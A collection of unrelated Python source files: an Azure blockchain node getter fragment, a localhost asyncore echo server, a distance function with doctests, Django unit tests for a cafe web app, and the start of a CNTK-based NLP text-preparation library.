__args__ = dict()
__args__['blockchainMemberName'] = blockchain_member_name
__args__['resourceGroupName'] = resource_group_name
__args__['transactionNodeName'] = transaction_node_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:blockchain/v20180601preview:getTransactionNode', __args__, opts=opts, typ=GetTransactionNodeResult).value
return AwaitableGetTransactionNodeResult(
dns=__ret__.dns,
firewall_rules=__ret__.firewall_rules,
location=__ret__.location,
name=__ret__.name,
password=__ret__.password,
provisioning_state=__ret__.provisioning_state,
public_key=__ret__.public_key,
type=__ret__.type,
user_name=__ret__.user_name)
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import asyncore
import logging
logging.basicConfig(level=logging.DEBUG,
format='[*] %(name)s - %(funcName)16s - %(message)s')
class EchoHandler(asyncore.dispatcher_with_send):
def __init__(self, _sock=None, _map=None):
self.logger = logging.getLogger('EchoHandler')
self.BUFSIZE = 1024
asyncore.dispatcher.__init__(self, _sock, _map)
self.out_buffer = ''
def readable(self):
return True
def writable(self):
return False
def handle_read(self):
data = self.recv(self.BUFSIZE)
self.logger.debug('%d bytes | client <- server' % len(data))
self.send(data)
self.logger.debug('%d bytes | client -> server' % len(data))
def handle_writable(self):
pass
def handle_error(self):
self.logger.debug('socket exception')
def handle_close(self):
self.close()
class EchoServer(asyncore.dispatcher):
def __init__(self):
self.logger = logging.getLogger('EchoServer')
asyncore.dispatcher.__init__(self)
self.create_socket(asyncore.socket.AF_INET,
asyncore.socket.SOCK_STREAM)
# socket reuse address
self.set_reuse_addr()
self.logger.debug('create a socket')
self.bind(('localhost', 8080))
self.logger.debug('bind socket address')
self.listen(1)
self.logger.debug('listen socket on %s:%s' % ('localhost', 8080))
def handle_accept(self):
client, caddr = self.accept()
self.logger.debug('client: %s:%s' % caddr)
EchoHandler(client)
self.logger.debug('Enter into EchoHandler')
if __name__ == "__main__":
EchoServer()
asyncore.loop()
|
import math
def euclidean_distance(A, B):
"""
>>> A = (1, 0)
>>> B = (0, 1)
>>> euclidean_distance(A, B)
1.4142135623730951
>>> euclidean_distance((0,0), (1,0))
1.0
>>> euclidean_distance((0,0), (1,1))
1.4142135623730951
>>> euclidean_distance((0,1), (1,1))
1.0
>>> euclidean_distance((0,10), (1,1))
9.055385138137417
"""
x1 = A[0]
x2 = B[0]
y1 = A[1]
y2 = B[1]
part_x = (x2-x1) ** 2
part_y = (y2-y1) ** 2
return math.sqrt(part_x + part_y)
return math.sqrt((x2-x1)**2 + (y2-y1)**2)
return math.sqrt(pow(B[1]-A[1],2)+pow(B[0]-A[0],2))
|
""" Functions used for Unit Testing our web application """
from django.test import SimpleTestCase, TestCase, Client
from django.template.loader import render_to_string
from app.models import CafeTable, CoffeeUser, Message, Report, Task
client = Client()
class LogInTests(TestCase):
""" Unit tests for login page """
def setUp(self):
""" Setting up test user"""
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
def test_login_view_status_code(self):
""" Testing whether the status of the login page is OK
(if it's reachable) """
resp = self.client.get('') # login page
self.assertEqual(resp.status_code, 200)
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_template(self):
""" Testing the correct template is rendered """
resp = self.client.get('')
self.assertTemplateUsed(resp, 'login.html')
def test_login_correct(self):
""" Testing correct login """
data = {'email': 'test@test.com', 'password': '123'}
resp = self.client.post('', data) # login page
self.assertEqual(resp.status_code, 302)
def test_login_blank(self):
""" Testing with blank login details """
data = {'email': '', 'password': ''}
resp = self.client.post('', data)
self.assertEqual(resp.status_code, 200)
def test_login_bad_email(self):
""" Testing with incorrect email format """
data = {'email': 'a', 'password': 'ABCabc123!'}
resp = self.client.post('', data)
self.assertEqual(resp.status_code, 200)
def test_login_wrong_psw(self):
""" Testing with wrong password """
data = {'email': 'test@test.com', 'password': 'a'}
resp = self.client.post('', data)
self.assertEqual(resp.status_code, 200)
def test_login_nonexistent_user(self):
""" Testing with user that doesn't exist """
data = {'email': 'test2@test.com', 'password': 'a'}
resp = self.client.post('', data)
self.assertEqual(resp.status_code, 200)
class SignUpTests(TestCase):
""" Unit tests for signup page """
def setUp(self):
""" Setting up test user"""
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
def test_signup_view_status_code(self):
""" Testing whether the status of the signup page is OK
(if it's reachable) """
resp = self.client.get('/signup')
self.assertEqual(resp.status_code, 200)
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/signup')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_template(self):
""" Testing the correct template is rendered """
resp = self.client.get('/signup')
self.assertTemplateUsed(resp, 'sign_up.html')
def test_signup_valid_form(self):
""" Testing signing up a valid user """
data = {'email': 'test2@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'ABCabc123!', 'password2': 'ABCabc123!',
'accept_terms': True}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 302)
def test_signup_repeat_email(self):
""" Testing signing up a user email that already exists"""
data = {'email': 'test@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'ABCabc123!', 'password2': 'ABCabc123!',
'accept_terms': True}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_pswd_different(self):
""" Testing signing up when passwords don't match"""
data = {'email': 'test2@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'ABCabc123!!', 'password2': 'ABCabc123!',
'accept_terms': True}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_no_terms(self):
""" Testing signing up when terms not agreed to"""
data = {'email': 'test2@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'ABCabc123!!', 'password2': 'ABCabc123!',
'accept_terms': False}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_bad_psw(self):
""" Testing signing up when password is too bad"""
data = {'email': 'test2@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'a', 'password2': 'a',
'accept_terms': False}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_not_an_email(self):
""" Testing signing up when terms not agreed to"""
data = {'email': 'fish', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'a', 'password2': 'a',
'accept_terms': False}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_blank(self):
""" Testing signing up when blank fields"""
data = {'email': 'fish', 'password1': 'ABCabc123!',
'password2': 'ABCabc123!', 'accept_terms': False}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
class PrivacyPolicyTests(TestCase):
""" Unit tests for privacy policy page """
def test_privacy_policy_view_status_code(self):
""" Testing whether the status of the privacy policy page is OK
(if it's reachable) """
resp = self.client.get('/privacy')
self.assertEqual(resp.status_code, 200)
class TermsTests(TestCase):
""" Unit tests for terms and conditions page """
def test_tandc_view_status_code(self):
""" Testing whether the status of the terms & conditions page is OK
(if it's reachable) """
resp = self.client.get('/terms')
self.assertEqual(resp.status_code, 200)
class TablesViewTests(TestCase):
""" Unit tests for table view page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_tables_view_status_code(self):
""" Testing whether the status of the tables view page is OK
(if it's reachable) """
resp = self.client.get('/table_view')
self.assertEqual(resp.status_code, 200)
def test_tables_view_content(self):
""" Testing to see whether the correct table name is displayed """
resp = self.client.get('/table_view')
response_html = resp.content.decode()
self.assertEqual(resp.status_code, 200)
self.assertTrue('Test' in response_html)
self.assertFalse('Test 2' in response_html)
class InTableTests(TestCase):
""" Unit tests for table content pages """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_in_table_view_correct(self):
""" Testing to see whether the correct table content is displayed """
resp = self.client.get('/tables/1')
response_html = resp.content.decode()
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(response_html, render_to_string('denied.html'))
self.assertTrue('testf testl' in response_html) # names
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/tables/1')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_new_message_valid_post_data(self):
""" Testing to see whether the inputted message content is correctly
identified """
data = {
'message_content': 'Test msg',
}
self.client.post('/tables/1', data)
self.assertTrue(Message.objects.exists())
resp = self.client.get('/get_msgs/1')
response_html = resp.content.decode()
self.assertTrue('Test msg' in response_html)
def test_new_message_empty_post_data(self):
""" Testing to see if a message with no content is correctly
identified """
data = {
'message_content': '',
}
resp = self.client.post('/tables/1', data)
self.assertEqual(resp.status_code, 200)
self.assertFalse(Message.objects.exists())
def test_upvote(self):
""" Testing to see whether the inputted message content is correctly
identified """
data = {
'message_content': 'Test msg',
}
self.client.post('/tables/1', data)
msg = Message.objects.get(message_content='Test msg')
self.client.get('/upvote/' + str(msg.id))
resp = self.client.get('/get_msgs/1')
response_html = resp.content.decode()
self.assertTrue('1 Likes' in response_html)
def test_in_table_view_not_part_table(self):
""" Testing to see if incorrect table view is correctly identified
and handled"""
resp = self.client.get('/tables/2')
response_html = resp.content.decode()
self.assertEqual(resp.status_code, 200)
self.assertEqual(response_html, render_to_string('denied.html'))
def test_in_table_view_not_exist_table(self):
""" Testing to see if non existent table view is correctly identified
and handled"""
resp = self.client.get('/tables/3')
response_html = resp.content.decode()
self.assertEqual(resp.status_code, 200)
self.assertEqual(response_html, render_to_string('denied.html'))
class DashboardTests(TestCase):
""" Unit tests for dashboard page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the dashboard page is OK
(if it's reachable) """
resp = self.client.get('/dashboard')
self.assertEqual(resp.status_code, 200)
def test_template(self):
""" Testing the correct template is rendered """
resp = self.client.get('/dashboard')
self.assertTemplateUsed(resp, 'dashboard.html')
# Check whether it's displaying the correct user
response_html = resp.content.decode()
self.assertTrue(CoffeeUser.objects.get(
email='test@test.com').first_name in response_html)
self.assertTrue(CoffeeUser.objects.get(
email='test@test.com').last_name in response_html)
def test_check_collectables(self):
""" Testing the correct collectable is calculated """
resp = self.client.get('/dashboard')
response_html = resp.content.decode()
self.assertTrue('Espresso' in response_html)
self.assertTrue('Points till next collectable: 50' in response_html)
class EditInfoTests(TestCase):
""" Unit tests for edit info page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the edit info page is OK
(if it's reachable) """
resp = self.client.get('/dashboard/edit_info')
self.assertEqual(resp.status_code, 200)
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/dashboard/edit_info')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_template(self):
""" Testing whether the edit info page is used """
resp = self.client.get('/dashboard/edit_info')
self.assertTemplateUsed(resp, 'edit_info.html')
def test_changing_info(self):
""" Testing to see whether edits in the edit info page are correctly
identified """
data = {
'first_name': 'testfirstname',
'last_name': 'testlastname',
}
self.assertEqual(CoffeeUser.objects.get(
email='test@test.com').first_name, 'testf')
self.assertEqual(CoffeeUser.objects.get(
email='test@test.com').last_name, 'testl')
request = self.client.post('/dashboard/edit_info', data)
self.assertEqual(CoffeeUser.objects.get(
email='test@test.com').first_name, 'testfirstname')
self.assertEqual(CoffeeUser.objects.get(
email='test@test.com').last_name, 'testlastname')
class SetTaskTests(TestCase):
""" Unit tests for set tasks page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=True, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the set tasks page is OK
(if it's reachable) """
resp = self.client.get('/set_tasks')
self.assertEqual(resp.status_code, 200)
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/set_tasks')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_template(self):
""" Testing whether set tasks page is successfully used """
resp = self.client.get('/set_tasks')
self.assertTemplateUsed(resp, 'set_tasks.html')
def test_task_in_db(self):
""" Testing to see if setting a new task is correctly registered """
table = CafeTable.objects.get(id=1)
data = {
'task_name': 'f',
'table_id': str(table.id),
'task_content': 'fff',
'points': 1,
'recurrence_interval': 'n',
'max_repeats': 0,
}
self.assertTrue(Task.objects.count() == 0)
self.client.post('/set_tasks', data)
self.assertTrue(Task.objects.count() == 1)
class ViewTaskTests(TestCase):
""" Unit tests for view tasks page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user2 = CoffeeUser.objects.create_user(
email='test2@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=True, password='123'
)
Task.objects.create(task_name="tasktest", table_id=table,
created_by=user2, task_content="lol", points=1)
Task.objects.create(task_name="tasktestNTable", table_id=table2,
created_by=user2, task_content="lol", points=1)
Task.objects.create(task_name="tasktestNUser", table_id=table2,
created_by=user, task_content="lol", points=1)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the view tasks page is OK
(if it's reachable) """
resp = self.client.get('/view_tasks')
self.assertEqual(resp.status_code, 200)
def test_task_exists_in_db(self):
""" Testing database to see if created task is correctly registered """
self.assertTrue(Task.objects.count(), 1)
def test_template_connection(self):
""" Testing whether view tasks page template is used """
resp = self.client.get('/view_tasks')
self.assertTemplateUsed(resp, 'view_tasks.html')
def test_right_tasks_displayed(self):
""" Testing to see if only the tasks for the specific table are
displayed """
resp = self.client.get('/view_tasks')
response_html = resp.content.decode()
self.assertTrue('tasktest' in response_html)
self.assertFalse('tasktestNTable' in response_html)
self.assertFalse('tasktestNUser' in response_html)
# Tasks only from the correct tables are displayed + cannot see own
# tasks
def test_complete_task(self):
""" Tests points earn when task completed """
self.client.get('/complete/1')
resp = self.client.get('/view_tasks')
response_html = resp.content.decode()
user = CoffeeUser.objects.get(id=1)
self.assertTrue(user.points == 3)
self.assertFalse('tasktest' in response_html)
class ReportingTests(TestCase):
""" Unit tests for reports page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
self.user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
self.user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the report page is OK
(if it's reachable) """
resp = self.client.get('/report')
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, 'report.html')
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/report')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_create_report(self):
""" Testing whether a created report is managed correctly """
table = CafeTable.objects.get(id=1)
self.client.get('/report')
data = {
'title': 'TestReport-213943',
'category': "Other",
'detail': 'fff',
'table_id': str(table.id),
}
self.assertEqual(Report.objects.count(), 0)
resp = self.client.post('/report', data)
# Check request is successful
self.assertTrue(resp.status_code, 200)
# Check object created in database
self.assertEqual(Report.objects.count(), 1)
class ProfileTests(TestCase):
""" Unit tests for profile page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the profile page is OK
(if it's reachable) """
resp = self.client.get('/profile_page/1')
self.assertEqual(resp.status_code, 200)
def test_profile_not_exist_user(self):
""" Testing to see if non existent user is correctly identified
and handled"""
resp = self.client.get('/profile_page/8')
response_html = resp.content.decode()
self.assertEqual(response_html, render_to_string(
'profile_nonexistent.html'))
def test_template(self):
""" Testing the correct template is rendered """
resp = self.client.get('/profile_page/1')
self.assertTemplateUsed(resp, 'profile_page.html')
def test_profile_content(self):
""" Testing correct user is displayed """
resp = self.client.get('/profile_page/1')
response_html = resp.content.decode()
self.assertTrue(CoffeeUser.objects.get(
email='test@test.com').first_name in response_html)
self.assertTrue(CoffeeUser.objects.get(
email='test@test.com').last_name in response_html)
class HealthEndpointTests(SimpleTestCase):
""" Unit tests for overall web application status"""
def test_health_status_is_up(self):
""" Testing whether the application as a whole is reachable """
resp = self.client.get('/health')
self.assertEqual(resp.status_code, 200)
self.assertContains(resp, '{"status": "UP"}')
class ActiveUsersTest(TestCase):
""" Unit test for function calculating number of active users."""
def setUp(self):
""" Setting up test tables with content for testing """
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
self.client.login(email='test@test.com', password='123')
def test_active_users(self):
""" Testing to see if number of active users is correct """
resp = self.client.get('/table_view')
response_html = resp.content.decode()
self.assertTrue('Users in Cafe: 1' in response_html)
|
name = "yalesmartalarmclient"
|
### NLP TOOLBOX LIBRARY ###
# Created by Dmitri Paley
# ~First public version~
# This library was created to make certain deep-learning NLP uses easily accessible and usable by anyone
# The library is made to be easily imported into your Python code and for complex operations to be simply called via a few simple commands
# Call the GetHelp method of any module to get tips on how to use them
# Call the GetModulesInfo class to get the info about all modules present
#
# Future versions will include:
# Query / Sequence Classification
# Deep Structured Similarity Model
# Semantic space visualization
# Speech to text
# Text to speech
#
#########################
from __future__ import print_function
import cntk as C
import numpy as np
import os
import requests
import sys
class GetModulesInfo():
def __init__(self):
print("The current modules in the library are:\nTxtToCtf - used to prep your .txt files into a .ctf and .mapping files necessary for the SequenceToSequence model\nSequenceToSequence - the LSTM with Embedding and Attention model for sequence to sequence translation")
class TxtToCtf():
''' FUTURE IMPROVEMENTS:
TEST CTF PREP, VALIDATION CTF PREP
CUSTOM NON_SYMBOLS VOCABULARY SUPPORT, CUSTOM ALPHABED SUPPORT, CUSTOM REPLACE AND REPLACE_WITH LISTS SUPPORT
'''
def __init__(self, txt_path, source_filename, target_filename, ctf_save_path, ctf_filename, eos_manual='#', target_eos='</s>', target_bos='<s>', target_Meos = '<s/>', source_field_marker = 'S0', target_field_marker = 'S1'):
self.seq_field_src = source_field_marker
self.seq_field_trgt = target_field_marker
self.txt_path = txt_path
self.source_filename = source_filename
self.target_filename = target_filename
self.ctf_path = ctf_save_path
self.ctf_filename = ctf_filename
self.ctf_filepath = None
self.vocab_filepath = None
self.eos_manual = eos_manual
self.target_eos = target_eos
self.target_Meos = target_Meos
self.target_bos = target_bos
# alphabet vocab, and symbols to replace & with what vocabs (need to be aligned by indeces)
self.non_symbols = ["'",'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'] # this is a constant list
self.symbols_replace = ['”', '“', "it's", "i'm", "they're", "what're", "he's", "she's", "you're","we're","isn't", "aren't", "wasn't", "weren't", "don't","doesn't","didn't","i've", "we've", "haven't", "you've", "hadn't", "can't", "couldn't", "mustn't", "shan't", "shouldn't", "we'll", "they'll", "i'll", "we'd", "you'd","i'd","he'd","she'd","it'd","we'd","they'd","let's"] # this is a constant list
self.symbols_replace_with = ['"', '"', "it is", "i am", "they are", "what are", "he is", "she is", "you are", "we are", "is not", "are not", "was not", "were not", "do not", "does not", "did not", "i have", "we have", "have not", "you have", "had not", "can not", "could not", "must not", "shall not", "should not", "we will", "they will", "i will", "we would", "you would", "i would", "he would", "she would", "it would", "we would", "they would", "let us"]
self.source_filepath = self.path_join(source_filename)
self.target_filepath = self.path_join(target_filename)
self.ctf_path_join()
self.tokens_source = self.prep_tokens(self.source_filepath)
self.tokens_target = self.prep_tokens(self.target_filepath)
self.vocab = self.prep_vocab()
self.enum, self.i2w, self.w2i = self.save_vocab_and_enum()
self.ctf_writer(self.convert_to_ctf())
def GetHelp():
print("You are using the TextToCtf module from the NLP toolbox library, built by Dmitri Paley.\nInstructions on how to use:\n")
print("The TextToCtf module takes two .txt files - the source and the target files, source being what you want to translate FROM, target being what you want to translate TO, and creates a paired CTF file for use with the SequenceToSequence module. It also creates a .mapping vocabulary file containing the vocabulary from all the sequences.\nFORMATTING THE SOURCE AND TARGET FILES:\nThe source and target texts should be in plain .txt format files, and saved in the UTF-8 format. When saving the .txt file, simply click Save As and select the UTF-8 format at the bottom of the save screen.\nThe text in the .txt files needs to be manually divided into the sequences via the manual_eos marker.\n The default manual_eos marker is a hashtag (#). The use is simple - for every sequence pair in your source and target files, just put the manual_eos marker at the end of the sequences.\nFor example, if your source file says 'mary had a little lamb, she walked it in the park', and your target file says 'mary had a big fat lamb, who sat around all day', you might write 'mary had a little lamb,# she walked it in the park#' in the source file and 'mary had a big fat lamb,#, who sat around all day#', simply adding the manual_eos marker, # by default, at the end of every sequence. What constitnues a sequence is up to you to decide.\nBoth source and target files absolutaly have to have the same amount of sequences, in order for correct pairing to occur, so they have to have the same amount of manual_eos markers (by default, same amount of hashtags #).\nIf you downloaded the example texts, check them out to get the picture.\n\n")
print("USE INSTRUCTIONS:\nInstantiate the TextToCtf module with the variables for:\ntxt_path = the path of the directory containing the .txt files\nsource_filename = the name of the .txt file of your source text, including extension, like: my_source.txt\ntarget_filename = the name of the .txt file of your target text, including the .txt file extension\nctf_save_path = the path of the directory where you want the paired .ctf file to be saved, as well as where the .mapping vocabulary file is saved. Both the .ctf and .mapping files are what the SequenceToSequence module uses to train\nctf_filename = the name of the .ctf file to create, including the .ctf extension. For example: training_file.ctf\n")
print("Optional variables - these variables have a pre-defined default value already, and you should only change this if you understand what and why you are doing it. The defaults are:\neos_manual='#'\ntarget_eos='</s>'\ntarget_bos='<s>'\ntarget_Meos = '<s/>'\nsource_field_marker = 'S0'\ntarget_field_marker = 'S1'")
print("\n\nOnce instantiated with the variables, the TextToCtf module will automatically process both the source and target texts into the correct format and necessary files for the SequenceToSequence module and will automatically save the needed files to the directory you specified in the ctf_save_path variable.")
def path_join(self, text_name):
text_filepath = os.path.join(self.txt_path, text_name)
if not os.path.exists(text_filepath):
print("Error: File path {} does not exist. Please create it, or make sure the file is in it and named correctly.".format(self.txt_filepath))
sys.exit("Action stopped")
return text_filepath
def ctf_path_join(self):
if not os.path.exists(self.ctf_path):
try:
os.makedirs(self.ctf_path)
except:
print("Error: Coult not create {} directory. Please create the directory.".format(self.ctf_path))
sys.exit("Action stopped")
self.ctf_filepath = os.path.join(self.ctf_path, self.ctf_filename)
vocab = 'vocabulary.mapping'
self.vocab_filepath = os.path.join(self.ctf_path, vocab)
def txt_to_tokens(self, filepath):
txt = open(filepath, 'r', encoding='utf-8-sig')
words = txt.read().lower().split()
return words
def split_n_flatten(self, words_list):
# split all words & symbols (creates list of lists)
for index in range(len(words_list)):
words_list[index] = words_list[index].split()
# flatten list of lists
words_list = [word for sublist in words_list for word in sublist]
return words_list
def prep_tokens(self, text_path):
words = self.txt_to_tokens(text_path)
# space out all symbols from words
for index in range(len(words)):
new_word = ''
for character in words[index]:
if character not in self.non_symbols:
new_c = ''.join([' ',character,' '])
new_word = new_word + new_c
else:
new_word = new_word + character
words[index] = new_word
# split & flatten
words = self.split_n_flatten(words)
# replace repleables
words.insert(0, self.target_bos)
for index in range(len(words)):
if words[index] in self.symbols_replace:
words[index] = self.symbols_replace_with[self.symbols_replace.index(words[index])]
if words[index] == self.eos_manual:
if index != (len(words) - 1):
words[index] = ' '.join([self.target_eos, self.target_bos])
else:
words[index] = self.target_eos
# split & flatten
words = self.split_n_flatten(words)
# ALL TOKENS SHOULD NOW BE PRE-PROCESSED
return words
def prep_vocab(self):
# extract all unique tokens from words to build vocabulary
vocab_tokens = ["'" ,self.target_eos, self.target_Meos, self.target_bos]
for token in self.tokens_source:
if token not in vocab_tokens:
vocab_tokens.append(token)
for token in self.tokens_target:
if token not in vocab_tokens:
vocab_tokens.append(token)
return vocab_tokens
def save_vocab_and_enum(self):
enum=[]
index_2_word={}
word_2_index={}
vocab_file = open(self.vocab_filepath, "w", encoding='utf-8-sig')
for count, token in enumerate(self.vocab):
enum.append(count + 1)
if (count + 1) == len(self.vocab):
vocab_file.write(token)
else:
vocab_file.write(''.join([token,'\n']))
index_2_word.update({(count+1):token})
word_2_index.update({token:(count+1)})
vocab_file.close()
print("Vocabulary saved to %s." %self.vocab_filepath)
return enum, index_2_word, word_2_index
# THE NEXT STEP IS - WITH VOCAB TOKENS & ENUMERATE - CREATE TWO CTF PAIRING LISTS
# LASTLY, CREATE SINGLE CTF WITH FULL PAIRINGS
# gets token, and whether this is the source or target sequence boolean
def token_to_pairing_index(self, token, source):
field = ''
if source == True:
field = self.seq_field_src
elif source == False:
field = self.seq_field_trgt
token_index = self.w2i[token]
return '|%s %d:1' %(field, token_index)
def convert_to_ctf(self):
# use sequence counter & count until eos on both source and target token full lists, then transfer them to local lists
sequence_counter = 0
ctf_src_list=[]
ctf_trgt_list=[]
# add tuple of sequence number & tokens(indexed) to each pairing list
for token in self.tokens_source:
if token != self.target_eos:
# if the token is not end of sentence - just append it
ctf_src_list.append((sequence_counter, self.token_to_pairing_index(token, source=True)))
else:
# if the token IS end of sentence - append it, and then iterate the sequence counter forward
ctf_src_list.append((sequence_counter, self.token_to_pairing_index(token, source=True)))
sequence_counter += 1
sequence_counter = 0
for token in self.tokens_target:
if token != self.target_eos:
# if the token is not end of sentence - just append it
ctf_trgt_list.append((sequence_counter, self.token_to_pairing_index(token, source=False)))
else:
# if the token IS end of sentence - append it, and then iterate the sequence counter forward
ctf_trgt_list.append((sequence_counter, self.token_to_pairing_index(token, source=False)))
sequence_counter += 1
# pair the indeces by creating two lists of lists - each list's corresponding index is the sequence
sequence_counter = 0
tmp_lst=[]
list_of_lists_src=[]
for item in ctf_src_list:
# each item is a tuple
sequence, index = item
if sequence == sequence_counter:
tmp_lst.append(index)
elif sequence == (sequence_counter + 1):
sequence_counter += 1
list_of_lists_src.append(tmp_lst)
tmp_lst=[index]
sequence_counter=0
tmp_lst=[]
list_of_lists_trgt=[]
for item in ctf_trgt_list:
sequence, index = item
if sequence == sequence_counter:
tmp_lst.append(index)
elif sequence == (sequence_counter + 1):
sequence_counter += 1
list_of_lists_trgt.append(tmp_lst)
tmp_lst=[index]
# both lists should have same length
# in fact, the two documents HAVE TO HAVE THE SAME AMOUNT OF PAIRED SEQUENCES!
paired_list=[]
if len(list_of_lists_src) != len(list_of_lists_trgt):
print("Error: The source and target documents don't have the same amount of sequences.\nThe two documents must have the same amount of sequences in order for the sequences to be paired.")
print("The sequence counts are- Source:{}, Target:{}".format(len(list_of_lists_src),len(list_of_lists_trgt)))
sys.exit("Stopping action")
for i in range(len(list_of_lists_src)):
# every i is the number of sequence
# check which words list is longer (if either)
if len(list_of_lists_src[i]) > len(list_of_lists_trgt[i]):
# list of source tokens is longer, the target list is shorter
# the difference
dif = abs(len(list_of_lists_src[i]) - len(list_of_lists_trgt[i]))
for difference in range(dif):
# add enough empty strings to close the difference gap, to the shorter list
list_of_lists_trgt[i].append(' ')
elif len(list_of_lists_src[i]) < len(list_of_lists_trgt[i]):
# list of target tokens is longer, the source list is shorter
# the difference
dif = abs(len(list_of_lists_src[i]) - len(list_of_lists_trgt[i]))
for difference in range(dif):
# add enough empty strings to close the difference gap, to the shorter list
list_of_lists_src[i].append(' ')
# now both word lists are the same length
for n in range(len(list_of_lists_src[i])):
line = '\t'.join([str(i), list_of_lists_src[i][n], list_of_lists_trgt[i][n],'\n'])
paired_list.append(line)
#for item in paired_list:
# print(item)
return paired_list
def ctf_writer(self, words):
ctf_file = open(self.ctf_filepath, "w", encoding='utf-8-sig')
for line in words:
ctf_file.write(line)
ctf_file.close()
print("Paired CTF saved to {}.".format(self.ctf_filepath))
class SequenceToSequence ():
''' FUTURE IMPROVEMENTS:
ALL FILES DECLARATION WILL BE SUPPORTED WITHOUT EXTENSION NAMEES (WITHOUT .TXT, .CTF, ETC)
EPOCH SIZE WILL BE AUTOMATICALLY DETERMINED
